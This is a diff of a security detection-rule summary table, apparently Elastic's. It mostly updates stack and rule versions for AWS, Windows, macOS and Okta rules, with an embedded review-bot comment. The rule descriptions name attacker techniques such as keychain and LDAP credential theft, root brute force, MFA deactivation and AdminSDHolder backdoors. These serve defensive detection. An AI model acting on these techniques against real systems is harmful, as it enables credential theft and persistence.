|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Resources: Investigation Guide], [Tactic: Impact] |8.3.0 |107 +|<<aws-iam-deactivation-of-mfa-device, AWS IAM Deactivation of MFA Device>> |Identifies the deactivation of a specified multi-factor authentication (MFA) device and removes it from association with the user name for which it was originally enabled. In AWS Identity and Access Management (IAM), a device must be deactivated before it can be deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Resources: Investigation Guide], [Tactic: Impact] |8.9.0 |208 -|<<aws-iam-group-creation, AWS IAM Group Creation>> |Identifies the creation of a group in AWS Identity and Access Management (IAM). Groups specify permissions for multiple users. Any user in a group automatically has the permissions that are assigned to the group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Persistence] |8.3.0 |104 +|<<aws-iam-group-creation, AWS IAM Group Creation>> |Identifies the creation of a group in AWS Identity and Access Management (IAM). Groups specify permissions for multiple users. Any user in a group automatically has the permissions that are assigned to the group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Persistence] |8.9.0 |205 -|<<aws-iam-group-deletion, AWS IAM Group Deletion>> |Identifies the deletion of a specified AWS Identity and Access Management (IAM) resource group. Deleting a resource group does not delete resources that are members of the group; it only deletes the group structure. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.3.0 |104 +|<<aws-iam-group-deletion, AWS IAM Group Deletion>> |Identifies the deletion of a specified AWS Identity and Access Management (IAM) resource group. 
Deleting a resource group does not delete resources that are members of the group; it only deletes the group structure. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.9.0 |205 -|<<aws-iam-password-recovery-requested, AWS IAM Password Recovery Requested>> |Identifies AWS IAM password recovery requests. An adversary may attempt to gain unauthorized AWS access by abusing password recovery mechanisms. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Initial Access] |8.3.0 |104 +|<<aws-iam-password-recovery-requested, AWS IAM Password Recovery Requested>> |Identifies AWS IAM password recovery requests. An adversary may attempt to gain unauthorized AWS access by abusing password recovery mechanisms. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Initial Access] |8.9.0 |205 -|<<aws-iam-user-addition-to-group, AWS IAM User Addition to Group>> |Identifies the addition of a user to a specified group in AWS Identity and Access Management (IAM). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Tactic: Persistence], [Resources: Investigation Guide] |8.3.0 |107 +|<<aws-iam-user-addition-to-group, AWS IAM User Addition to Group>> |Identifies the addition of a user to a specified group in AWS Identity and Access Management (IAM). |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Credential Access], [Tactic: Persistence], [Resources: Investigation Guide] |8.9.0 |208 -|<<aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion, AWS KMS Customer Managed Key Disabled or Scheduled for Deletion>> |Identifies attempts to disable or schedule the deletion of an AWS KMS Customer Managed Key (CMK). 
Deleting an AWS KMS key is destructive and potentially dangerous. It deletes the key material and all metadata associated with the KMS key and is irreversible. After a KMS key is deleted, the data that was encrypted under that KMS key can no longer be decrypted, which means that data becomes unrecoverable. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Impact] |8.3.0 |4 +|<<aws-kms-customer-managed-key-disabled-or-scheduled-for-deletion, AWS KMS Customer Managed Key Disabled or Scheduled for Deletion>> |Identifies attempts to disable or schedule the deletion of an AWS KMS Customer Managed Key (CMK). Deleting an AWS KMS key is destructive and potentially dangerous. It deletes the key material and all metadata associated with the KMS key and is irreversible. After a KMS key is deleted, the data that was encrypted under that KMS key can no longer be decrypted, which means that data becomes unrecoverable. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Tactic: Impact] |8.9.0 |105 -|<<aws-management-console-brute-force-of-root-user-identity, AWS Management Console Brute Force of Root User Identity>> |Identifies a high number of failed authentication attempts to the AWS management console for the Root user identity. An adversary may attempt to brute force the password for the Root user identity, as it has complete access to all services and resources for the AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Credential Access] |8.3.0 |104 +|<<aws-management-console-brute-force-of-root-user-identity, AWS Management Console Brute Force of Root User Identity>> |Identifies a high number of failed authentication attempts to the AWS management console for the Root user identity. 
An adversary may attempt to brute force the password for the Root user identity, as it has complete access to all services and resources for the AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Credential Access] |8.9.0 |205 -|<<aws-management-console-root-login, AWS Management Console Root Login>> |Identifies a successful login to the AWS Management Console by the Root user. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |8.3.0 |107 +|<<aws-management-console-root-login, AWS Management Console Root Login>> |Identifies a successful login to the AWS Management Console by the Root user. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Initial Access] |8.9.0 |208 -|<<aws-rds-cluster-creation, AWS RDS Cluster Creation>> |Identifies the creation of a new Amazon Relational Database Service (RDS) Aurora DB cluster or global database spread across multiple regions. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.3.0 |104 +|<<aws-rds-cluster-creation, AWS RDS Cluster Creation>> |Identifies the creation of a new Amazon Relational Database Service (RDS) Aurora DB cluster or global database spread across multiple regions. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.9.0 |205 -|<<aws-rds-instance-creation, AWS RDS Instance Creation>> |Identifies the creation of an Amazon Relational Database Service (RDS) Aurora database instance. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.3.0 |104 +|<<aws-rds-instance-creation, AWS RDS Instance Creation>> |Identifies the creation of an Amazon Relational Database Service (RDS) Aurora database instance. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.9.0 |205 -|<<aws-rds-instance-cluster-stoppage, AWS RDS Instance/Cluster Stoppage>> |Identifies that an Amazon Relational Database Service (RDS) cluster or instance has been stopped. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Impact] |8.3.0 |104 +|<<aws-rds-instance-cluster-stoppage, AWS RDS Instance/Cluster Stoppage>> |Identifies that an Amazon Relational Database Service (RDS) cluster or instance has been stopped. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Impact] |8.9.0 |205 -|<<aws-rds-security-group-creation, AWS RDS Security Group Creation>> |Identifies the creation of an Amazon Relational Database Service (RDS) Security group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Persistence] |8.3.0 |104 +|<<aws-rds-security-group-creation, AWS RDS Security Group Creation>> |Identifies the creation of an Amazon Relational Database Service (RDS) Security group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Persistence] |8.9.0 |205 -|<<aws-rds-security-group-deletion, AWS RDS Security Group Deletion>> |Identifies the deletion of an Amazon Relational Database Service (RDS) Security group. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.3.0 |104 +|<<aws-rds-security-group-deletion, AWS RDS Security Group Deletion>> |Identifies the deletion of an Amazon Relational Database Service (RDS) Security group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Tactic: Impact] |8.9.0 |205 -|<<aws-rds-snapshot-export, AWS RDS Snapshot Export>> |Identifies the export of an Amazon Relational Database Service (RDS) Aurora database snapshot. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Exfiltration] |8.3.0 |104 +|<<aws-rds-snapshot-export, AWS RDS Snapshot Export>> |Identifies the export of an Amazon Relational Database Service (RDS) Aurora database snapshot. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Exfiltration] |8.9.0 |205 -|<<aws-rds-snapshot-restored, AWS RDS Snapshot Restored>> |Identifies when an attempt was made to restore an RDS Snapshot. Snapshots are sometimes shared by threat actors in order to exfiltrate bulk data or evade detection after performing malicious activities. If the permissions were modified, verify if the snapshot was shared with an unauthorized or unexpected AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-rds-snapshot-restored, AWS RDS Snapshot Restored>> |Identifies when an attempt was made to restore an RDS Snapshot. Snapshots are sometimes shared by threat actors in order to exfiltrate bulk data or evade detection after performing malicious activities. If the permissions were modified, verify if the snapshot was shared with an unauthorized or unexpected AWS account. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-redshift-cluster-creation, AWS Redshift Cluster Creation>> |Identifies the creation of an Amazon Redshift cluster. Unexpected creation of this cluster by a non-administrative user may indicate a permission or role issue with current users. If unexpected, the resource may not properly be configured and could introduce security vulnerabilities. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.3.0 |104 +|<<aws-redshift-cluster-creation, AWS Redshift Cluster Creation>> |Identifies the creation of an Amazon Redshift cluster. Unexpected creation of this cluster by a non-administrative user may indicate a permission or role issue with current users. If unexpected, the resource may not properly be configured and could introduce security vulnerabilities. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.9.0 |205 -|<<aws-root-login-without-mfa, AWS Root Login Without MFA>> |Identifies attempts to login to AWS as the root user without using multi-factor authentication (MFA). Amazon AWS best practices indicate that the root user should be protected by MFA. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Privilege Escalation] |8.3.0 |107 +|<<aws-root-login-without-mfa, AWS Root Login Without MFA>> |Identifies attempts to login to AWS as the root user without using multi-factor authentication (MFA). Amazon AWS best practices indicate that the root user should be protected by MFA. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Resources: Investigation Guide], [Tactic: Privilege Escalation] |8.9.0 |208 -|<<aws-route-53-domain-transfer-lock-disabled, AWS Route 53 Domain Transfer Lock Disabled>> |Identifies when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.3.0 |104 +|<<aws-route-53-domain-transfer-lock-disabled, AWS Route 53 Domain Transfer Lock Disabled>> |Identifies when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.9.0 |205 -|<<aws-route-53-domain-transferred-to-another-account, AWS Route 53 Domain Transferred to Another Account>> |Identifies when a request has been made to transfer a Route 53 domain to another AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.3.0 |104 +|<<aws-route-53-domain-transferred-to-another-account, AWS Route 53 Domain Transferred to Another Account>> |Identifies when a request has been made to transfer a Route 53 domain to another AWS account. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.9.0 |205 -|<<aws-route-table-created, AWS Route Table Created>> |Identifies when an AWS Route Table has been created. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.3.0 |104 +|<<aws-route-table-created, AWS Route Table Created>> |Identifies when an AWS Route Table has been created. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.9.0 |205 -|<<aws-route-table-modified-or-deleted, AWS Route Table Modified or Deleted>> |Identifies when an AWS Route Table has been modified or deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.3.0 |104 +|<<aws-route-table-modified-or-deleted, AWS Route Table Modified or Deleted>> |Identifies when an AWS Route Table has been modified or deleted. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.9.0 |205 -|<<aws-route53-private-hosted-zone-associated-with-a-vpc, AWS Route53 private hosted zone associated with a VPC>> |Identifies when a Route53 private hosted zone has been associated with VPC. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.3.0 |104 +|<<aws-route53-private-hosted-zone-associated-with-a-vpc, AWS Route53 private hosted zone associated with a VPC>> |Identifies when a Route53 private hosted zone has been associated with VPC. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Persistence] |8.9.0 |205 -|<<aws-s3-bucket-configuration-deletion, AWS S3 Bucket Configuration Deletion>> |Identifies the deletion of various Amazon Simple Storage Service (S3) bucket configuration components. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Defense Evasion] |8.3.0 |105 +|<<aws-s3-bucket-configuration-deletion, AWS S3 Bucket Configuration Deletion>> |Identifies the deletion of various Amazon Simple Storage Service (S3) bucket configuration components. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Asset Visibility], [Tactic: Defense Evasion] |8.9.0 |206 -|<<aws-saml-activity, AWS SAML Activity>> |Identifies when SAML activity has occurred in AWS. An adversary could manipulate SAML to maintain access to the target. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-saml-activity, AWS SAML Activity>> |Identifies when SAML activity has occurred in AWS. An adversary could manipulate SAML to maintain access to the target. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-sts-getsessiontoken-abuse, AWS STS GetSessionToken Abuse>> |Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation] |8.3.0 |104 +|<<aws-sts-getsessiontoken-abuse, AWS STS GetSessionToken Abuse>> |Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation] |8.9.0 |205 -|<<aws-security-group-configuration-change-detection, AWS Security Group Configuration Change Detection>> |Identifies a change to an AWS Security Group Configuration. 
A security group is like a virtual firewall, and modifying configurations may allow unauthorized access. Threat actors may abuse this to establish persistence, exfiltrate data, or pivot in an AWS environment. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.3.0 |104 +|<<aws-security-group-configuration-change-detection, AWS Security Group Configuration Change Detection>> |Identifies a change to an AWS Security Group Configuration. A security group is like a virtual firewall, and modifying configurations may allow unauthorized access. Threat actors may abuse this to establish persistence, exfiltrate data, or pivot in an AWS environment. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Persistence] |8.9.0 |205 -|<<aws-security-token-service-sts-assumerole-usage, AWS Security Token Service (STS) AssumeRole Usage>> |Identifies the use of AssumeRole. AssumeRole returns a set of temporary security credentials that can be used to access AWS resources. An adversary could use those credentials to move laterally and escalate privileges. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation] |8.3.0 |104 +|<<aws-security-token-service-sts-assumerole-usage, AWS Security Token Service (STS) AssumeRole Usage>> |Identifies the use of AssumeRole. AssumeRole returns a set of temporary security credentials that can be used to access AWS resources. An adversary could use those credentials to move laterally and escalate privileges. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Identity and Access Audit], [Tactic: Privilege Escalation] |8.9.0 |205 -|<<aws-vpc-flow-logs-deletion, AWS VPC Flow Logs Deletion>> |Identifies the deletion of one or more flow logs in AWS Elastic Compute Cloud (EC2). 
An adversary may delete flow logs in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.3.0 |107 +|<<aws-vpc-flow-logs-deletion, AWS VPC Flow Logs Deletion>> |Identifies the deletion of one or more flow logs in AWS Elastic Compute Cloud (EC2). An adversary may delete flow logs in an attempt to evade defenses. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Log Auditing], [Resources: Investigation Guide], [Tactic: Defense Evasion] |8.9.0 |208 -|<<aws-waf-access-control-list-deletion, AWS WAF Access Control List Deletion>> |Identifies the deletion of a specified AWS Web Application Firewall (WAF) access control list. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-waf-access-control-list-deletion, AWS WAF Access Control List Deletion>> |Identifies the deletion of a specified AWS Web Application Firewall (WAF) access control list. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.9.0 |205 -|<<aws-waf-rule-or-rule-group-deletion, AWS WAF Rule or Rule Group Deletion>> |Identifies the deletion of a specified AWS Web Application Firewall (WAF) rule or rule group. |[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.3.0 |104 +|<<aws-waf-rule-or-rule-group-deletion, AWS WAF Rule or Rule Group Deletion>> |Identifies the deletion of a specified AWS Web Application Firewall (WAF) rule or rule group. 
|[Domain: Cloud], [Data Source: AWS], [Data Source: Amazon Web Services], [Use Case: Network Security Monitoring], [Tactic: Defense Evasion] |8.9.0 |205 -|<<abnormal-process-id-or-lock-file-created, Abnormal Process ID or Lock File Created>> |Identifies the creation of a Process ID (PID), lock or reboot file created in temporary file storage paradigm (tmpfs) directory /var/run. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |209 +|<<abnormal-process-id-or-lock-file-created, Abnormal Process ID or Lock File Created>> |Identifies the creation of a Process ID (PID), lock or reboot file created in temporary file storage paradigm (tmpfs) directory /var/run. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. |[Domain: Endpoint], [OS: Linux], [Use Case: Threat Detection], [Tactic: Execution], [Threat: BPFDoor], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.6.0 |210 |<<abnormally-large-dns-response, Abnormally Large DNS Response>> |Specially crafted DNS requests can manipulate a known overflow vulnerability in some Windows DNS servers, resulting in Remote Code Execution (RCE) or a Denial of Service (DoS) from crashing the service. |[Use Case: Threat Detection], [Tactic: Lateral Movement], [Resources: Investigation Guide], [Use Case: Vulnerability] |8.3.0 |105 
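Review bot: every AWS row in this hunk raises the minimum stack version from 8.3.0 to 8.9.0 and adds 101 to the rule version (for example `|8.3.0 |104` becomes `|8.9.0 |205`, and `|8.3.0 |107` becomes `|8.9.0 |208`) while the description and tag columns are left byte-identical, so the summary table gives a reader no indication of why the floor moved; since users on stacks 8.3 through 8.8 will stop receiving updates to these rules, the commit's "downloadable updates description" should state the reason, because the table itself cannot. Style point on the `AWS Execution via System Manager` row: `RunShellScript, RunPowerShellScript, and alike` would read better as `and the like`, but that text is copied from the rule source and should be fixed there rather than in the generated table.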
@@ -138,31 +138,31 @@ and their rule type is `machine_learning`. |<<access-to-keychain-credentials-directories, Access to Keychain Credentials Directories>> |Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes and certificates. |[Domain: Endpoint], [OS: macOS], [Use Case: Threat Detection], [Tactic: Credential Access], [Data Source: Elastic Defend] |8.3.0 |104 -|<<access-to-a-sensitive-ldap-attribute, Access to a Sensitive LDAP Attribute>> |Identify access to sensitive Active Directory object attributes that contains credentials and decryption keys such as unixUserPassword, ms-PKI-AccountCredentials and msPKI-CredentialRoamingTokens. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |7 +|<<access-to-a-sensitive-ldap-attribute, Access to a Sensitive LDAP Attribute>> |Identify access to sensitive Active Directory object attributes that contains credentials and decryption keys such as unixUserPassword, ms-PKI-AccountCredentials and msPKI-CredentialRoamingTokens. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Credential Access], [Tactic: Privilege Escalation], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |8 |<<accessing-outlook-data-files, Accessing Outlook Data Files>> |Identifies commands containing references to Outlook data files extensions, which can potentially indicate the search, access, or modification of these files. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Collection], [Data Source: Elastic Defend], [Rule Type: BBR] |8.3.0 |1 |<<account-configured-with-never-expiring-password, Account Configured with Never-Expiring Password>> |Detects the creation and modification of an account with the "Don't Expire Password" option Enabled. Attackers can abuse this misconfiguration to persist in the domain and maintain long-term access using compromised accounts with this property. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |107 -|<<account-discovery-command-via-system-account, Account Discovery Command via SYSTEM Account>> |Identifies when the SYSTEM account uses an account discovery utility. This could be a sign of discovery activity after an adversary has achieved privilege escalation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |106 +|<<account-discovery-command-via-system-account, Account Discovery Command via SYSTEM Account>> |Identifies when the SYSTEM account uses an account discovery utility. This could be a sign of discovery activity after an adversary has achieved privilege escalation. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Tactic: Privilege Escalation], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |107 -|<<account-password-reset-remotely, Account Password Reset Remotely>> |Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence] |8.3.0 |106 +|<<account-password-reset-remotely, Account Password Reset Remotely>> |Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Tactic: Impact] |8.3.0 |107 |<<account-or-group-discovery-via-built-in-tools, Account or Group Discovery via Built-In Tools>> |Adversaries may use built-in applications to get a listing of local system or domain accounts and groups. |[Domain: Endpoint], [OS: Linux], [OS: macOS], [Use Case: Threat Detection], [Tactic: Discovery], [Rule Type: BBR], [Data Source: Elastic Defend] |8.3.0 |2 -|<<adfind-command-activity, AdFind Command Activity>> |This rule detects the Active Directory query tool, AdFind.exe. AdFind has legitimate purposes, but it is frequently leveraged by threat actors to perform post-exploitation Active Directory reconnaissance. The AdFind tool has been observed in Trickbot, Ryuk, Maze, and FIN6 campaigns. For Winlogbeat, this rule requires Sysmon. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |106 +|<<adfind-command-activity, AdFind Command Activity>> |This rule detects the Active Directory query tool, AdFind.exe. AdFind has legitimate purposes, but it is frequently leveraged by threat actors to perform post-exploitation Active Directory reconnaissance. The AdFind tool has been observed in Trickbot, Ryuk, Maze, and FIN6 campaigns. For Winlogbeat, this rule requires Sysmon. 
|[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Discovery], [Resources: Investigation Guide], [Data Source: Elastic Endgame], [Data Source: Elastic Defend] |8.3.0 |107 -|<<adding-hidden-file-attribute-via-attrib, Adding Hidden File Attribute via Attrib>> |Adversaries can add the 'hidden' attribute to files to hide them from the user in an attempt to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |108 +|<<adding-hidden-file-attribute-via-attrib, Adding Hidden File Attribute via Attrib>> |Adversaries can add the 'hidden' attribute to files to hide them from the user in an attempt to evade detection. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Defense Evasion], [Tactic: Persistence], [Data Source: Elastic Endgame], [Resources: Investigation Guide], [Data Source: Elastic Defend] |8.3.0 |109 -|<<adminsdholder-backdoor, AdminSDHolder Backdoor>> |Detects modifications in the AdminSDHolder object. Attackers can abuse the SDProp process to implement a persistent backdoor in Active Directory. SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, regaining their Administrative Privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |105 +|<<adminsdholder-backdoor, AdminSDHolder Backdoor>> |Detects modifications in the AdminSDHolder object. Attackers can abuse the SDProp process to implement a persistent backdoor in Active Directory. 
SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, regaining their Administrative Privileges. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Use Case: Active Directory Monitoring], [Data Source: Active Directory] |8.3.0 |106 -|<<adminsdholder-sdprop-exclusion-added, AdminSDHolder SDProp Exclusion Added>> |Identifies a modification on the dsHeuristics attribute on the bit that holds the configuration of groups excluded from the SDProp process. The SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, meaning that groups excluded will remain unchanged. Attackers can abuse this misconfiguration to maintain long-term access to privileged accounts in these groups. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |107 +|<<adminsdholder-sdprop-exclusion-added, AdminSDHolder SDProp Exclusion Added>> |Identifies a modification on the dsHeuristics attribute on the bit that holds the configuration of groups excluded from the SDProp process. The SDProp compares the permissions on protected objects with those defined on the AdminSDHolder object. If the permissions on any of the protected accounts and groups do not match, the permissions on the protected accounts and groups are reset to match those of the domain's AdminSDHolder object, meaning that groups excluded will remain unchanged. 
Attackers can abuse this misconfiguration to maintain long-term access to privileged accounts in these groups. |[Domain: Endpoint], [OS: Windows], [Use Case: Threat Detection], [Tactic: Persistence], [Data Source: Active Directory], [Resources: Investigation Guide], [Use Case: Active Directory Monitoring] |8.3.0 |108 -|<<administrator-privileges-assigned-to-an-okta-group, Administrator Privileges Assigned to an Okta Group>> |Detects when an administrator role is assigned to an Okta group. An adversary may attempt to assign administrator privileges to an Okta group in order to assign additional permissions to compromised user accounts and maintain access to their target organization. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Persistence] |8.3.0 |104 +|<<administrator-privileges-assigned-to-an-okta-group, Administrator Privileges Assigned to an Okta Group>> |Detects when an administrator role is assigned to an Okta group. An adversary may attempt to assign administrator privileges to an Okta group in order to assign additional permissions to compromised user accounts and maintain access to their target organization. |[Use Case: Identity and Access Audit], [Data Source: Okta], [Tactic: Persistence] |8.10.0 |205 -|<<administrator-role-assigned-to-an-okta-user, Administrator Role Assigned to an Okta User>> |Identifies when an administrator role is assigned to an Okta user. An adversary may attempt to assign an administrator role to an Okta user in order to assign additional permissions to a user account and maintain access to their target's environment. |[Data Source: Okta], [Use Case: Identity and Access 